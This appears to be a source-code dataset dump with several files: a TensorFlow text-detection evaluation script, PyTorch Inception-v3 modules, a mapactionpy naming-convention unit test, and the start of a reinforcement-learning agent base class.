[lnk_shape[0], lnk_shape[1], lnk_shape[2], -1])
# link status is 1 where probability is higher than threshold
link_labels = tf.cast(tf.greater_equal(lnk_pos_prob_maps, FLAGS.link_threshold),
tf.int32)
all_nodes.append(node_labels)
all_links.append(link_labels)
all_reg.append(reg_maps)
fetches['link_labels_%d' % i] = link_labels
# decode segments and links
segments, group_indices, segment_counts = ops.decode_segments_links(
image_size, all_nodes, all_links, all_reg,
anchor_sizes=list(detector.anchor_sizes))
fetches['segments'] = segments
fetches['group_indices'] = group_indices
fetches['segment_counts'] = segment_counts
# combine segments
combined_rboxes, combined_counts = ops.combine_segments(
segments, group_indices, segment_counts)
fetches['combined_rboxes'] = combined_rboxes
fetches['combined_counts'] = combined_counts
sess_config = tf.ConfigProto()
with tf.Session(config=sess_config) as sess:
# load model
model_loader = tf.train.Saver()
model_loader.restore(sess, FLAGS.test_model)
batch_size = FLAGS.test_batch_size
n_batches = int(math.ceil(FLAGS.num_test / batch_size))
# result directory
result_dir = os.path.join(FLAGS.log_dir, 'results' + FLAGS.result_suffix)
utils.mkdir_if_not_exist(result_dir)
intermediate_result_path = os.path.join(FLAGS.log_dir, 'intermediate.pkl')
if FLAGS.load_intermediate:
all_batches = joblib.load(intermediate_result_path)
logging.info('Intermediate result loaded from {}'.format(intermediate_result_path))
else:
# run all batches and store results in a list
all_batches = []
with slim.queues.QueueRunners(sess):
for i in range(n_batches):
if i % 10 == 0:
logging.info('Evaluating batch %d/%d' % (i+1, n_batches))
sess_outputs = sess.run(fetches)
all_batches.append(sess_outputs)
if FLAGS.save_intermediate:
joblib.dump(all_batches, intermediate_result_path, compress=5)
logging.info('Intermediate result saved to {}'.format(intermediate_result_path))
# # visualize local rboxes (TODO)
# if FLAGS.save_vis:
# vis_save_prefix = os.path.join(save_dir, 'localpred_batch_%d_' % i)
# pred_rboxes_counts = []
# for j in range(len(all_maps)):
# pred_rboxes_counts.append((sess_outputs['segments_det_%d' % j],
# sess_outputs['segment_counts_det_%d' % j]))
# _visualize_layer_det(sess_outputs['images'],
# pred_rboxes_counts,
# vis_save_prefix)
# # visualize joined rboxes (TODO)
# if FLAGS.save_vis:
# vis_save_prefix = os.path.join(save_dir, 'batch_%d_' % i)
# # _visualize_linked_det(sess_outputs, save_prefix)
# _visualize_combined_rboxes(sess_outputs, vis_save_prefix)
if FLAGS.result_format == 'icdar_2015_inc':
postprocess_and_write_results_ic15(all_batches, result_dir)
elif FLAGS.result_format == 'icdar_2013':
postprocess_and_write_results_ic13(all_batches, result_dir)
else:
logging.critical('Unknown result format: {}'.format(FLAGS.result_format))
sys.exit(1)
logging.info('Evaluation done.')
def postprocess_and_write_results_ic15(all_batches, result_dir):
test_count = 0
for batch in all_batches:
for i in range(FLAGS.test_batch_size):
# the last batch may contain duplicates
if test_count > FLAGS.num_test: break
rboxes = batch['combined_rboxes'][i]
count = batch['combined_counts'][i]
rboxes = rboxes[:count, :]
# post processings
if FLAGS.bbox_scale > 1.0:
rboxes[:, 3:5] *= FLAGS.bbox_scale
# convert rboxes to polygons and find its coordinates on the original image
orig_h, orig_w = batch['orig_size'][i]
resize_h, resize_w = batch['resize_size'][i]
polygons = utils.rboxes_to_polygons(rboxes)
scale_y = float(orig_h) / float(resize_h)
scale_x = float(orig_w) / float(resize_w)
# confine polygons inside image
polygons[:, ::2] = np.maximum(0, np.minimum(polygons[:, ::2] * scale_x, orig_w-1))
polygons[:, 1::2] = np.maximum(0, np.minimum(polygons[:, 1::2] * scale_y, orig_h-1))
polygons = np.round(polygons).astype(np.int32)
# write results to text files
image_name = batch['image_name'][i].decode('ascii')
result_fname = 'res_{}.txt'.format(os.path.splitext(image_name)[0])
orig_size = batch['orig_size'][i]
save_path = os.path.join(result_dir, result_fname)
with open(save_path, 'w') as f:
lines = []
for k in range(polygons.shape[0]):
poly_str = list(polygons[k])
poly_str = [str(o) for o in poly_str]
poly_str = ','.join(poly_str)
lines.append(poly_str)
# remove duplicated lines
lines = list(frozenset(lines))
f.write('\r\n'.join(lines))
#logging.info('Detection results written to {}'.format(save_path))
test_count += 1
# compress results into a single zip file
result_dir_name = 'results' + FLAGS.result_suffix
cmd = "zip -rj {}.zip {}".format(os.path.join(result_dir, '..', result_dir_name),
result_dir)
logging.info('Executing {}'.format(cmd))
os.system(cmd)
def postprocess_and_write_results_ic13(all_results):
raise NotImplementedError('This function needs revision')
for j in range(batch_size):
# convert detection results
rboxes = sess_outputs['combined_rboxes'][j]
count = sess_outputs['combined_counts'][j]
orig_h, orig_w = sess_outputs['orig_size'][j]
resize_h, resize_w = sess_outputs['resize_size'][j]
bboxes = utils.rboxes_to_bboxes(rboxes[:count, :])
# bbox scaling trick
bbox_scale = FLAGS.bbox_scale
bboxes_width = bboxes[:,2] - bboxes[:,0]
bboxes_height = bboxes[:,3] - bboxes[:,1]
bboxes[:,0] -= 0.5 * bbox_scale * bboxes_width
bboxes[:,1] -= 0.5 * bbox_scale * bboxes_height
bboxes[:,2] += 0.5 * bbox_scale * bboxes_width
bboxes[:,3] += 0.5 * bbox_scale * bboxes_height
scale_y = float(orig_h) / float(resize_h)
scale_x = float(orig_w) / float(resize_w)
bboxes[:, ::2] = np.maximum(0, np.minimum(bboxes[:, ::2] * scale_x, orig_w-1))
bboxes[:, 1::2] = np.maximum(0, np.minimum(bboxes[:, 1::2] * scale_y, orig_h-1))
bboxes = np.round(bboxes).astype(np.int32)
# write results to text files
image_name = str(sess_outputs['image_name'][j])
result_fname = 'res_' + os.path.splitext(image_name)[0] + '.txt'
orig_size = sess_outputs['orig_size'][j]
save_path = os.path.join(result_dir, result_fname)
with open(save_path, 'w') as f:
lines = []
for k in range(bboxes.shape[0]):
bbox_str = list(bboxes[k])
bbox_str = [str(o) for o in bbox_str]
bbox_str = ','.join(bbox_str)
lines.append(bbox_str)
# remove duplicated lines
lines = list(set(lines))
f.write('\r\n'.join(lines))
#logging.info('Detection results written to {}'.format(save_path))
# save images and lexicon list for post-processing
if FLAGS.save_image_and_lexicon:
sess_outputs['']
if __name__ == '__main__':
# create logging dir if not existed
utils.mkdir_if_not_exist(FLAGS.log_dir)
# set up logging
log_file_name = FLAGS.log_prefix + time.strftime('%Y%m%d_%H%M%S') + '.log'
log_file_path = os.path.join(FLAGS.log_dir, log_file_name)
utils.setup_logger(log_file_path)
utils.log_flags(FLAGS)
#utils.log_git_version()
# run test
evaluate() | en | 0.575495 | # logging # testing # post processing # intermediate results # useless flags, do not set # input data # each test image is resized to a different size # test batch size must be 1 # resize every image to the same size # detector # decode local predictions # segments classification # node status is 1 where probability is higher than threshold # link classification # link status is 1 where probability is higher than threshold # decode segments and links # combine segments # load model # result directory # run all batches and store results in a list # # visualize local rboxes (TODO) # if FLAGS.save_vis: # vis_save_prefix = os.path.join(save_dir, 'localpred_batch_%d_' % i) # pred_rboxes_counts = [] # for j in range(len(all_maps)): # pred_rboxes_counts.append((sess_outputs['segments_det_%d' % j], # sess_outputs['segment_counts_det_%d' % j])) # _visualize_layer_det(sess_outputs['images'], # pred_rboxes_counts, # vis_save_prefix) # # visualize joined rboxes (TODO) # if FLAGS.save_vis: # vis_save_prefix = os.path.join(save_dir, 'batch_%d_' % i) # # _visualize_linked_det(sess_outputs, save_prefix) # _visualize_combined_rboxes(sess_outputs, vis_save_prefix) # the last batch may contain duplicates # post processings # convert rboxes to polygons and find its coordinates on the original image # confine polygons inside image # write results to text files # remove duplicated lines #logging.info('Detection results written to {}'.format(save_path)) # compress results into a single zip file # convert detection results # bbox scaling trick # write results to text files # remove duplicated lines #logging.info('Detection results written to {}'.format(save_path)) # save images and lexicon list for post-processing # create logging dir if not existed # set up logging #utils.log_git_version() # run test | 2.004411 | 2 |
Chapter4/ex_4_15.py | zxjzxj9/PyTorchIntroduction | 205 | 6612370 | <filename>Chapter4/ex_4_15.py<gh_stars>100-1000
""" 本代码可以被其它代码导入,作为模型的一部分
"""
# InceptionA module
class InceptionA(nn.Module):
    """Inception-v3 "A" block: four parallel branches concatenated along
    the channel axis.

    Branch output channels: 1x1 -> 64; 5x5 (via 1x1 reduce) -> 64;
    double 3x3 (via 1x1 reduce) -> 96; avg-pool + 1x1 -> pool_features.
    All branches preserve spatial size, so the block emits
    224 + pool_features channels at the input resolution.
    """
    def __init__(self, in_channels, pool_features):
        super(InceptionA, self).__init__()
        self.branch1x1 = BasicConv2d(in_channels, 64, kernel_size=1)
        self.branch5x5_1 = BasicConv2d(in_channels, 48, kernel_size=1)
        self.branch5x5_2 = BasicConv2d(48, 64, kernel_size=5, padding=2)
        self.branch3x3dbl_1 = BasicConv2d(in_channels, 64, kernel_size=1)
        self.branch3x3dbl_2 = BasicConv2d(64, 96, kernel_size=3, padding=1)
        self.branch3x3dbl_3 = BasicConv2d(96, 96, kernel_size=3, padding=1)
        self.branch_pool = BasicConv2d(in_channels, pool_features,
                                       kernel_size=1)
    def forward(self, x):
        branch1x1 = self.branch1x1(x)
        branch5x5 = self.branch5x5_1(x)
        branch5x5 = self.branch5x5_2(branch5x5)
        branch3x3dbl = self.branch3x3dbl_1(x)
        branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
        branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
        # 3x3/stride-1/pad-1 avg pool keeps spatial size; 1x1 conv sets channels
        branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)
        branch_pool = self.branch_pool(branch_pool)
        outputs = [branch1x1, branch5x5, branch3x3dbl, branch_pool]
        return torch.cat(outputs, 1)
# InceptionB module
class InceptionB(nn.Module):
    """Inception-v3 "B" (grid reduction) block.

    All three branches use stride 2, halving the spatial size; output
    channels are 384 (3x3) + 96 (double 3x3) + in_channels (max-pool).
    """
    def __init__(self, in_channels):
        super(InceptionB, self).__init__()
        self.branch3x3 = BasicConv2d(in_channels, 384, kernel_size=3,
                                     stride=2)
        self.branch3x3dbl_1 = BasicConv2d(in_channels, 64, kernel_size=1)
        self.branch3x3dbl_2 = BasicConv2d(64, 96, kernel_size=3, padding=1)
        self.branch3x3dbl_3 = BasicConv2d(96, 96, kernel_size=3, stride=2)
    def forward(self, x):
        branch3x3 = self.branch3x3(x)
        branch3x3dbl = self.branch3x3dbl_1(x)
        branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
        branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
        # stride-2 max pool matches the convolutional branches' downsampling
        branch_pool = F.max_pool2d(x, kernel_size=3, stride=2)
        outputs = [branch3x3, branch3x3dbl, branch_pool]
        return torch.cat(outputs, 1)
# InceptionC module
class InceptionC(nn.Module):
    """Inception-v3 "C" block with factorized 7x7 convolutions.

    7x7 convolutions are replaced by (1,7)/(7,1) pairs; channels_7x7 sets
    the intermediate width of those branches. Every branch ends with 192
    channels, so the block outputs 4 * 192 = 768 channels at the input
    resolution.
    """
    def __init__(self, in_channels, channels_7x7):
        super(InceptionC, self).__init__()
        self.branch1x1 = BasicConv2d(in_channels, 192, kernel_size=1)
        c7 = channels_7x7
        self.branch7x7_1 = BasicConv2d(in_channels, c7, kernel_size=1)
        self.branch7x7_2 = BasicConv2d(c7, c7, kernel_size=(1, 7),
                                       padding=(0, 3))
        self.branch7x7_3 = BasicConv2d(c7, 192, kernel_size=(7, 1),
                                       padding=(3, 0))
        self.branch7x7dbl_1 = BasicConv2d(in_channels, c7, kernel_size=1)
        self.branch7x7dbl_2 = BasicConv2d(c7, c7, kernel_size=(7, 1),
                                          padding=(3, 0))
        self.branch7x7dbl_3 = BasicConv2d(c7, c7, kernel_size=(1, 7),
                                          padding=(0, 3))
        self.branch7x7dbl_4 = BasicConv2d(c7, c7, kernel_size=(7, 1),
                                          padding=(3, 0))
        self.branch7x7dbl_5 = BasicConv2d(c7, 192, kernel_size=(1, 7),
                                          padding=(0, 3))
        self.branch_pool = BasicConv2d(in_channels, 192, kernel_size=1)
    def forward(self, x):
        branch1x1 = self.branch1x1(x)
        branch7x7 = self.branch7x7_1(x)
        branch7x7 = self.branch7x7_2(branch7x7)
        branch7x7 = self.branch7x7_3(branch7x7)
        branch7x7dbl = self.branch7x7dbl_1(x)
        branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)
        branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)
        branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)
        branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)
        # stride-1/pad-1 avg pool keeps spatial size before the 1x1 conv
        branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)
        branch_pool = self.branch_pool(branch_pool)
        outputs = [branch1x1, branch7x7, branch7x7dbl, branch_pool]
        return torch.cat(outputs, 1)
# InceptionD module
class InceptionD(nn.Module):
    """Inception-v3 "D" (grid reduction) block.

    The convolutional branches end in stride-2 3x3 convs and the pool
    branch uses a stride-2 max pool, halving the spatial size; output
    channels are 320 + 192 + in_channels.
    """
    def __init__(self, in_channels):
        super(InceptionD, self).__init__()
        self.branch3x3_1 = BasicConv2d(in_channels, 192, kernel_size=1)
        self.branch3x3_2 = BasicConv2d(192, 320, kernel_size=3, stride=2)
        self.branch7x7x3_1 = BasicConv2d(in_channels, 192, kernel_size=1)
        self.branch7x7x3_2 = BasicConv2d(192, 192, kernel_size=(1, 7), padding=(0, 3))
        self.branch7x7x3_3 = BasicConv2d(192, 192, kernel_size=(7, 1), padding=(3, 0))
        self.branch7x7x3_4 = BasicConv2d(192, 192, kernel_size=3, stride=2)
    def forward(self, x):
        branch3x3 = self.branch3x3_1(x)
        branch3x3 = self.branch3x3_2(branch3x3)
        branch7x7x3 = self.branch7x7x3_1(x)
        branch7x7x3 = self.branch7x7x3_2(branch7x7x3)
        branch7x7x3 = self.branch7x7x3_3(branch7x7x3)
        branch7x7x3 = self.branch7x7x3_4(branch7x7x3)
        branch_pool = F.max_pool2d(x, kernel_size=3, stride=2)
        outputs = [branch3x3, branch7x7x3, branch_pool]
        return torch.cat(outputs, 1)
# InceptionE module
class InceptionE(nn.Module):
    """Inception-v3 "E" block with expanded filter-bank outputs.

    The 3x3 branches each split into parallel (1,3) and (3,1) convolutions
    whose results are concatenated. Output channels:
    320 + (384+384) + (384+384) + 192 = 2048, at the input resolution.
    """
    def __init__(self, in_channels):
        super(InceptionE, self).__init__()
        self.branch1x1 = BasicConv2d(in_channels, 320, kernel_size=1)
        self.branch3x3_1 = BasicConv2d(in_channels, 384, kernel_size=1)
        self.branch3x3_2a = BasicConv2d(384, 384, kernel_size=(1, 3),
                                        padding=(0, 1))
        self.branch3x3_2b = BasicConv2d(384, 384, kernel_size=(3, 1),
                                        padding=(1, 0))
        self.branch3x3dbl_1 = BasicConv2d(in_channels, 448, kernel_size=1)
        self.branch3x3dbl_2 = BasicConv2d(448, 384, kernel_size=3, padding=1)
        self.branch3x3dbl_3a = BasicConv2d(384, 384, kernel_size=(1, 3),
                                           padding=(0, 1))
        self.branch3x3dbl_3b = BasicConv2d(384, 384, kernel_size=(3, 1),
                                           padding=(1, 0))
        self.branch_pool = BasicConv2d(in_channels, 192, kernel_size=1)
    def forward(self, x):
        branch1x1 = self.branch1x1(x)
        branch3x3 = self.branch3x3_1(x)
        # split into parallel 1x3 / 3x1 sub-branches, then concatenate
        branch3x3 = [
            self.branch3x3_2a(branch3x3),
            self.branch3x3_2b(branch3x3),
        ]
        branch3x3 = torch.cat(branch3x3, 1)
        branch3x3dbl = self.branch3x3dbl_1(x)
        branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
        branch3x3dbl = [
            self.branch3x3dbl_3a(branch3x3dbl),
            self.branch3x3dbl_3b(branch3x3dbl),
        ]
        branch3x3dbl = torch.cat(branch3x3dbl, 1)
        branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)
        branch_pool = self.branch_pool(branch_pool)
        outputs = [branch1x1, branch3x3, branch3x3dbl, branch_pool]
        return torch.cat(outputs, 1)
# InceptionAux module
class InceptionAux(nn.Module):
    """Auxiliary classifier head: 5x5/stride-3 avg pool, a 1x1 and a 5x5
    conv, global average pooling, then a linear layer to num_classes.

    The .stddev attributes set here look like hints for an external
    weight-initialization routine -- NOTE(review): that routine is not
    visible in this file; confirm.
    """
    def __init__(self, in_channels, num_classes):
        super(InceptionAux, self).__init__()
        self.conv0 = BasicConv2d(in_channels, 128, kernel_size=1)
        self.conv1 = BasicConv2d(128, 768, kernel_size=5)
        self.conv1.stddev = 0.01  # init hint consumed elsewhere (see class docstring)
        self.fc = nn.Linear(768, num_classes)
        self.fc.stddev = 0.001
    def forward(self, x):
        x = F.avg_pool2d(x, kernel_size=5, stride=3)
        x = self.conv0(x)
        x = self.conv1(x)
        # collapse to 1x1 spatially, then flatten to (N, 768) for the fc
        x = F.adaptive_avg_pool2d(x, (1, 1))
        x = torch.flatten(x, 1)
        x = self.fc(x)
        return x
| <filename>Chapter4/ex_4_15.py<gh_stars>100-1000
""" 本代码可以被其它代码导入,作为模型的一部分
"""
# InceptionA 模块
class InceptionA(nn.Module):
def __init__(self, in_channels, pool_features):
super(InceptionA, self).__init__()
self.branch1x1 = BasicConv2d(in_channels, 64, kernel_size=1)
self.branch5x5_1 = BasicConv2d(in_channels, 48, kernel_size=1)
self.branch5x5_2 = BasicConv2d(48, 64, kernel_size=5, padding=2)
self.branch3x3dbl_1 = BasicConv2d(in_channels, 64, kernel_size=1)
self.branch3x3dbl_2 = BasicConv2d(64, 96, kernel_size=3, padding=1)
self.branch3x3dbl_3 = BasicConv2d(96, 96, kernel_size=3, padding=1)
self.branch_pool = BasicConv2d(in_channels, pool_features,
kernel_size=1)
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch5x5 = self.branch5x5_1(x)
branch5x5 = self.branch5x5_2(branch5x5)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch5x5, branch3x3dbl, branch_pool]
return torch.cat(outputs, 1)
# InceptionB 模块
class InceptionB(nn.Module):
def __init__(self, in_channels):
super(InceptionB, self).__init__()
self.branch3x3 = BasicConv2d(in_channels, 384, kernel_size=3,
stride=2)
self.branch3x3dbl_1 = BasicConv2d(in_channels, 64, kernel_size=1)
self.branch3x3dbl_2 = BasicConv2d(64, 96, kernel_size=3, padding=1)
self.branch3x3dbl_3 = BasicConv2d(96, 96, kernel_size=3, stride=2)
def forward(self, x):
branch3x3 = self.branch3x3(x)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = F.max_pool2d(x, kernel_size=3, stride=2)
outputs = [branch3x3, branch3x3dbl, branch_pool]
return torch.cat(outputs, 1)
# InceptionC 模块
class InceptionC(nn.Module):
def __init__(self, in_channels, channels_7x7):
super(InceptionC, self).__init__()
self.branch1x1 = BasicConv2d(in_channels, 192, kernel_size=1)
c7 = channels_7x7
self.branch7x7_1 = BasicConv2d(in_channels, c7, kernel_size=1)
self.branch7x7_2 = BasicConv2d(c7, c7, kernel_size=(1, 7),
padding=(0, 3))
self.branch7x7_3 = BasicConv2d(c7, 192, kernel_size=(7, 1),
padding=(3, 0))
self.branch7x7dbl_1 = BasicConv2d(in_channels, c7, kernel_size=1)
self.branch7x7dbl_2 = BasicConv2d(c7, c7, kernel_size=(7, 1),
padding=(3, 0))
self.branch7x7dbl_3 = BasicConv2d(c7, c7, kernel_size=(1, 7),
padding=(0, 3))
self.branch7x7dbl_4 = BasicConv2d(c7, c7, kernel_size=(7, 1),
padding=(3, 0))
self.branch7x7dbl_5 = BasicConv2d(c7, 192, kernel_size=(1, 7),
padding=(0, 3))
self.branch_pool = BasicConv2d(in_channels, 192, kernel_size=1)
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch7x7 = self.branch7x7_1(x)
branch7x7 = self.branch7x7_2(branch7x7)
branch7x7 = self.branch7x7_3(branch7x7)
branch7x7dbl = self.branch7x7dbl_1(x)
branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)
branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch7x7, branch7x7dbl, branch_pool]
return torch.cat(outputs, 1)
# InceptionD 模块
class InceptionD(nn.Module):
def __init__(self, in_channels):
super(InceptionD, self).__init__()
self.branch3x3_1 = BasicConv2d(in_channels, 192, kernel_size=1)
self.branch3x3_2 = BasicConv2d(192, 320, kernel_size=3, stride=2)
self.branch7x7x3_1 = BasicConv2d(in_channels, 192, kernel_size=1)
self.branch7x7x3_2 = BasicConv2d(192, 192, kernel_size=(1, 7), padding=(0, 3))
self.branch7x7x3_3 = BasicConv2d(192, 192, kernel_size=(7, 1), padding=(3, 0))
self.branch7x7x3_4 = BasicConv2d(192, 192, kernel_size=3, stride=2)
def forward(self, x):
branch3x3 = self.branch3x3_1(x)
branch3x3 = self.branch3x3_2(branch3x3)
branch7x7x3 = self.branch7x7x3_1(x)
branch7x7x3 = self.branch7x7x3_2(branch7x7x3)
branch7x7x3 = self.branch7x7x3_3(branch7x7x3)
branch7x7x3 = self.branch7x7x3_4(branch7x7x3)
branch_pool = F.max_pool2d(x, kernel_size=3, stride=2)
outputs = [branch3x3, branch7x7x3, branch_pool]
return torch.cat(outputs, 1)
# InceptionE 模块
class InceptionE(nn.Module):
def __init__(self, in_channels):
super(InceptionE, self).__init__()
self.branch1x1 = BasicConv2d(in_channels, 320, kernel_size=1)
self.branch3x3_1 = BasicConv2d(in_channels, 384, kernel_size=1)
self.branch3x3_2a = BasicConv2d(384, 384, kernel_size=(1, 3),
padding=(0, 1))
self.branch3x3_2b = BasicConv2d(384, 384, kernel_size=(3, 1),
padding=(1, 0))
self.branch3x3dbl_1 = BasicConv2d(in_channels, 448, kernel_size=1)
self.branch3x3dbl_2 = BasicConv2d(448, 384, kernel_size=3, padding=1)
self.branch3x3dbl_3a = BasicConv2d(384, 384, kernel_size=(1, 3),
padding=(0, 1))
self.branch3x3dbl_3b = BasicConv2d(384, 384, kernel_size=(3, 1),
padding=(1, 0))
self.branch_pool = BasicConv2d(in_channels, 192, kernel_size=1)
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3 = self.branch3x3_1(x)
branch3x3 = [
self.branch3x3_2a(branch3x3),
self.branch3x3_2b(branch3x3),
]
branch3x3 = torch.cat(branch3x3, 1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = [
self.branch3x3dbl_3a(branch3x3dbl),
self.branch3x3dbl_3b(branch3x3dbl),
]
branch3x3dbl = torch.cat(branch3x3dbl, 1)
branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch3x3, branch3x3dbl, branch_pool]
return torch.cat(outputs, 1)
# InceptionAux 模块
class InceptionAux(nn.Module):
def __init__(self, in_channels, num_classes):
super(InceptionAux, self).__init__()
self.conv0 = BasicConv2d(in_channels, 128, kernel_size=1)
self.conv1 = BasicConv2d(128, 768, kernel_size=5)
self.conv1.stddev = 0.01
self.fc = nn.Linear(768, num_classes)
self.fc.stddev = 0.001
def forward(self, x):
x = F.avg_pool2d(x, kernel_size=5, stride=3)
x = self.conv0(x)
x = self.conv1(x)
x = F.adaptive_avg_pool2d(x, (1, 1))
x = torch.flatten(x, 1)
x = self.fc(x)
return x
| zh | 0.88411 | 本代码可以被其它代码导入,作为模型的一部分 # InceptionA 模块 # InceptionB 模块 # InceptionC 模块 # InceptionD 模块 # InceptionE 模块 # InceptionAux 模块 | 2.561233 | 3 |
mapactionpy_controller/tests/test_check_naming_convention.py | mehulmj/mapactionpy_controller | 1 | 6612371 | from unittest import TestCase
import mapactionpy_controller.check_naming_convention as check_naming_convention
import mapactionpy_controller.name_convention as name_convention
from mapactionpy_controller.crash_move_folder import CrashMoveFolder
import os
import six
# works differently for python 2.7 and python 3.x
if six.PY2:
import mock # noqa: F401
from mock import mock_open, patch
else:
from unittest import mock # noqa: F401
from unittest.mock import mock_open, patch # noqa: F401
class TestCheckNamingConventionTool(TestCase):
def setUp(self):
self.parent_dir = os.path.dirname(
os.path.dirname(os.path.realpath(__file__)))
self.cmf_descriptor_path = os.path.join(
self.parent_dir, 'example', 'cmf_description_flat_test.json')
def test_get_single_file_checker(self):
cmf = CrashMoveFolder(self.cmf_descriptor_path)
nc_desc_path = os.path.join(self.parent_dir, 'example', 'data_naming_convention.json')
nc = name_convention.NamingConvention(nc_desc_path)
passing_path = '/path/to/some/gisdata/206_bldg/ken_bldg_bdg_py_s4_osm_pp.shp'
func = check_naming_convention.get_single_file_checker(passing_path, nc, cmf)
self.assertIn('parsable and valid', func().get_message)
failing_path = '/path/to/some/gisdata/202_admn/ken_admn_ad0_ln_s0_IEBC_pp_HDX.shp'
func = check_naming_convention.get_single_file_checker(failing_path, nc, cmf)
self.assertRaises(ValueError, func)
| from unittest import TestCase
import mapactionpy_controller.check_naming_convention as check_naming_convention
import mapactionpy_controller.name_convention as name_convention
from mapactionpy_controller.crash_move_folder import CrashMoveFolder
import os
import six
# works differently for python 2.7 and python 3.x
if six.PY2:
import mock # noqa: F401
from mock import mock_open, patch
else:
from unittest import mock # noqa: F401
from unittest.mock import mock_open, patch # noqa: F401
class TestCheckNamingConventionTool(TestCase):
def setUp(self):
self.parent_dir = os.path.dirname(
os.path.dirname(os.path.realpath(__file__)))
self.cmf_descriptor_path = os.path.join(
self.parent_dir, 'example', 'cmf_description_flat_test.json')
def test_get_single_file_checker(self):
cmf = CrashMoveFolder(self.cmf_descriptor_path)
nc_desc_path = os.path.join(self.parent_dir, 'example', 'data_naming_convention.json')
nc = name_convention.NamingConvention(nc_desc_path)
passing_path = '/path/to/some/gisdata/206_bldg/ken_bldg_bdg_py_s4_osm_pp.shp'
func = check_naming_convention.get_single_file_checker(passing_path, nc, cmf)
self.assertIn('parsable and valid', func().get_message)
failing_path = '/path/to/some/gisdata/202_admn/ken_admn_ad0_ln_s0_IEBC_pp_HDX.shp'
func = check_naming_convention.get_single_file_checker(failing_path, nc, cmf)
self.assertRaises(ValueError, func)
| en | 0.638704 | # works differently for python 2.7 and python 3.x # noqa: F401 # noqa: F401 # noqa: F401 | 2.217744 | 2 |
agent/base.py | mrernst/rl_robotics_research | 0 | 6612372 | <filename>agent/base.py
#!/usr/bin/python
# _____________________________________________________________________________
# ----------------
# import libraries
# ----------------
# standard libraries
# -----
from util.replay_buffer import ReplayBuffer
import numpy as np
import torch
import gym
import argparse
import os
import sys
import imageio
import base64
from gym.wrappers.monitoring import video_recorder
import glfw
# utilities
# -----
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
class Agent(object):
"""
Abstract Agent Base Class
"""
def __init__(self):
pass
def set_final_goal(self, fg):
self.fg = fg
def step(self, s, env, step, global_step=0, explore=False):
raise NotImplementedError
def append(self, step, s, a, n_s, r, d):
raise NotImplementedError
def train(self, global_step):
raise NotImplementedError
def end_step(self):
raise NotImplementedError
def end_episode(self, episode, logger=None):
raise NotImplementedError
def evaluate_policy(self, env, eval_episodes=10, render=False, save_video=False, sleep=-1, results_dir='./save', timestep=-1):
if save_video:
from OpenGL import GL
#env = gym.wrappers.Monitor(env, directory='video',
# write_upon_reset=True, force=True, resume=True, mode='evaluation')
os.makedirs(f'{results_dir}/video/', exist_ok = True)
video = imageio.get_writer(f'{results_dir}/video/t{timestep}.mp4', fps=30)
render = False
success = 0
rewards = []
env.evaluate = True
with torch.no_grad():
for e in range(eval_episodes):
obs = env.reset()
fg = obs['desired_goal']
fg_dim = fg.shape[0]
s = obs['observation']
done = False
reward_episode_sum = 0
step = 0
self.set_final_goal(fg)
while not done:
if render:
if hasattr(self, 'sg'):
env.render(subgoal=self.sg+s[:self.sg.shape[0]]) #if possible render subgoal
else:
env.render()
if sleep>0:
time.sleep(sleep)
a, r, n_s, done = self.step(s, env, step)
reward_episode_sum += r
s = n_s
step += 1
self.end_step()
if save_video:
if hasattr(self, 'sg'):
video.append_data(env.render(subgoal=self.sg+s[:self.sg.shape[0]], mode='rgb_array'))
else:
video.append_data(env.render(mode='rgb_array'))
else:
error = np.sqrt(np.sum(np.square(fg-s[:fg_dim])))
print(" " * 80 + "\r" +
'[Eval] Goal, Curr: (%02.2f, %02.2f, %02.2f, %02.2f) Error:%.2f'%(fg[0], fg[1], s[0], s[1], error), end='\r')
rewards.append(reward_episode_sum)
success += 1 if error <=5 else 0
# this is not suited for every environment, distance should be adapted
self.end_episode(e)
if hasattr(env, 'viewer') and render:
v = env.viewer
#env.viewer = None
glfw.destroy_window(v.window)
#del v
env.evaluate = False
return np.array(rewards), success/eval_episodes
| <filename>agent/base.py
#!/usr/bin/python
# _____________________________________________________________________________
# ----------------
# import libraries
# ----------------
# standard libraries
# -----
from util.replay_buffer import ReplayBuffer
import numpy as np
import torch
import gym
import argparse
import os
import sys
import imageio
import base64
from gym.wrappers.monitoring import video_recorder
import glfw
# utilities
# -----
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
class Agent(object):
"""
Abstract Agent Base Class
"""
def __init__(self):
pass
def set_final_goal(self, fg):
self.fg = fg
def step(self, s, env, step, global_step=0, explore=False):
raise NotImplementedError
def append(self, step, s, a, n_s, r, d):
raise NotImplementedError
